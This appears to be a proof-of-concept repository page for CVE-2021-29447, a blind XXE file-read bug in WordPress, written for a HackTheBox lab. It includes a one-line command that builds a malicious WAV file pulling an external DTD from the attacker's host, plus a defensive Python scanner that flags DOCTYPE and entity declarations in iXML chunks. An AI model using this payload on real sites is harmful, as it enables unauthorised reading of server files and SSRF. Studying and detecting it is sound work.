
CVE-2021-29447 PoC — WordPress code issue vulnerability

Associated Vulnerability
Title: WordPress code issue vulnerability (CVE-2021-29447)
Description: WordPress is a blog platform developed in PHP by the WordPress Foundation. The platform supports setting up a personal blog site on a server running PHP and MySQL. WordPress contains a code issue vulnerability: an attacker who completes a successful XXE attack can use it to access internal files.
Description
Arbitrary file read controller based on CVE-2021-29447
Readme
## Blind XXE controller

I made this controller while doing the MetaTwo machine on Hack The Box to exploit CVE-2021-29447, a WordPress XXE vulnerability in the Media Library affecting versions 5.7, 5.6.2, 5.6.1, 5.6 and 5.0.11, where an authenticated user with the ability to upload to the media library can upload a malicious WAV file that could lead to remote arbitrary file read and server-side request forgery (SSRF).

Exploiting this vulnerability takes multiple steps, because the result of the parsed iXML metadata is never sent back to the user, so a blind XXE payload is required. This is done by including an external Document Type Definition (DTD) controlled by the attacker, and by creating the malicious WAV file that makes the server connect back to the attacker's listening server. Once these steps are done, upload the WAV file to the server and wait to receive an HTTP request that includes the base64-encoded content of the requested file (e.g. /etc/passwd), then decode the base64. This controller handles all of these steps: you only need to type the filename at the controller's **$console >** prompt.

Detailed blog [https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/](https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/)


Note: This controller is fully configured for the HTB MetaTwo machine. For any other use you will need to make some changes to the scripts.

### Usage

Create a WAV file named **payload.wav** (replace `YOUR_IP` with the address of your listener):

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

Run **main.py**, passing the IP address the listener should bind to:

```bash
python3 main.py listen_ip
```
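The defensive counterpart to the payload above is an upload-time check that walks the RIFF chunks of a WAV file and refuses any whose iXML metadata carries a DTD or external entity declaration, since legitimate iXML (Broadcast Wave metadata) never needs a DOCTYPE. The script below is an added example written for this page, not part of the PoC repository or of WordPress; the sample WAV bytes are constructed in the script (the `attacker.invalid` host is a placeholder) and the indicator patterns are a heuristic, not a complete XML parser.

```python
import re
import struct

# Constructed sample iXML payloads (not taken from any real upload).
MALICIOUS_IXML = (
    b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
    b"'http://attacker.invalid/evil.dtd'>%remote;]>"
)
BENIGN_IXML = b'<?xml version="1.0"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>'

# Heuristic markers of an XXE attempt inside an XML-bearing chunk.
INDICATORS = [
    (re.compile(rb"<!DOCTYPE", re.IGNORECASE), "DOCTYPE declaration"),
    (re.compile(rb"<!ENTITY", re.IGNORECASE), "entity declaration"),
    (re.compile(rb"\b(SYSTEM|PUBLIC)\s+['\"]", re.IGNORECASE), "external identifier"),
]


def build_wav(ixml: bytes) -> bytes:
    """Assemble a minimal RIFF/WAVE container holding only an iXML chunk (test data)."""
    chunk = b"iXML" + struct.pack("<I", len(ixml)) + ixml
    if len(ixml) % 2:
        chunk += b"\x00"  # RIFF chunks are padded to an even length
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_chunks(data: bytes):
    """Yield (chunk_id, payload) for each RIFF chunk, tolerating declared sizes that overrun the file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        payload = data[pos + 8:pos + 8 + size]  # slicing clamps an oversized length
        yield chunk_id, payload
        pos += 8 + size + (size & 1)  # skip the pad byte on odd-sized chunks


def find_xxe_indicators(wav: bytes) -> list:
    """Return the indicator labels found in the file's iXML chunk(s); an empty list means nothing suspicious."""
    findings = []
    for chunk_id, payload in iter_chunks(wav):
        if chunk_id != b"iXML":  # only the chunk the PoC abuses is inspected here
            continue
        for pattern, label in INDICATORS:
            if pattern.search(payload) and label not in findings:
                findings.append(label)
    return findings


def scan_file(path: str) -> list:
    """Convenience wrapper for checking an uploaded file on disk."""
    with open(path, "rb") as fh:
        return find_xxe_indicators(fh.read())


if __name__ == "__main__":
    for name, ixml in (("malicious", MALICIOUS_IXML), ("benign", BENIGN_IXML)):
        print(name, "->", find_xxe_indicators(build_wav(ixml)) or "clean")
```

Rejecting the upload when `find_xxe_indicators` returns anything is a cheap pre-filter; the actual fix for this class of bug is to keep external entity loading disabled in the XML parser that reads the metadata, which is what the WordPress 5.7.1 patch did, so the check above is worth keeping only as defence in depth for an unpatched or forked install.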

#### PoC image

![/poc/poc.png](/poc/poc.png)
File Snapshot

```
[4.0K] /data/pocs/55961006fa1b807515c472030622ca234b2753ce
├── [1.7K] controller.py
├── [1.1K] listener.py
├── [ 668] main.py
├── [4.0K] poc
│   └── [193K] poc.png
└── [1.7K] README.md

1 directory, 5 files
```